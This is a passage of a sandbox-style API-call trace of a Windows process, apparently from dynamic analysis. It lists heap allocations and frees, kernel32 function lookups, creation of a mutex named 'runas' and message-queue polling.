(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0119.593] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.593] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6b0 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.593] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedf8 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6b0 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.594] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.594] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5b0 [0119.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0119.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4f0 [0119.595] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0119.595] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4f0 | out: hHeap=0x12c0000) returned 1 [0119.595] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4f0 [0119.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateMutexW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14bd4a8 [0119.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateMutexW", cchWideChar=13, lpMultiByteStr=0x14bd4a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateMutexW", lpUsedDefaultChar=0x0) returned 13 [0119.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0119.596] GetProcAddress (hModule=0x74650000, lpProcName="CreateMutexW") returned 0x746766f0 [0119.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0119.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4f0 | out: hHeap=0x12c0000) returned 1 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4f0 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5b0 [0119.596] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20002) returned 0x1303e48 [0119.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4f0 | out: hHeap=0x12c0000) returned 1 [0119.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedd0 | out: hHeap=0x12c0000) returned 1 [0119.597] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="runas") returned 0x200 [0119.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4f0 [0119.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0119.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd490 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0119.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5a0 | out: hHeap=0x12c0000) returned 1 [0119.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0119.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0119.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0119.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0119.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5a0 [0119.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1303e48 | out: hHeap=0x12c0000) returned 1 [0119.600] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fedf8 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef550 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd238 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd268 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2e0 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2c8 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd280 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0119.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3730 | out: hHeap=0x12c0000) returned 1 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.602] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.602] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.602] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.602] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0119.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0119.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0119.604] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0119.604] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.604] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fed30 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef550 [0119.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0119.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0119.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0119.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0119.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6c0 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0119.605] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0119.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0119.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef590 [0119.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0119.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0119.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0119.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.606] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0119.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0119.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.606] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14bd4f0 [0119.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetLastError", cchWideChar=13, lpMultiByteStr=0x14bd4f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastError", lpUsedDefaultChar=0x0) returned 13 [0119.606] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0119.607] GetProcAddress (hModule=0x74650000, lpProcName="GetLastError") returned 0x74663870 [0119.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0119.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef4e0 | out: hHeap=0x12c0000) returned 1 [0119.607] GetLastError () returned 0x0 [0119.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef4e0 [0119.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1303e48 [0119.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef590 [0119.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0119.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0119.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0119.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef5b0 [0119.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0119.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0119.609] FreeLibrary (hLibModule=0x74650000) returned 1 [0119.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0119.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.610] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.610] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0119.611] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef5b0 [0119.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6b0 [0119.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6b0 | out: hHeap=0x12c0000) returned 1 [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0119.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6c0 [0119.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0119.611] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0119.611] GetLastError () returned 0x0 [0119.611] SetLastError (dwErrCode=0x0) [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6c0 | out: hHeap=0x12c0000) returned 1 [0119.611] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef5b0 | out: hHeap=0x12c0000) returned 1 [0119.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0119.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0119.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3460 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd490 | out: hHeap=0x12c0000) returned 1 [0119.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 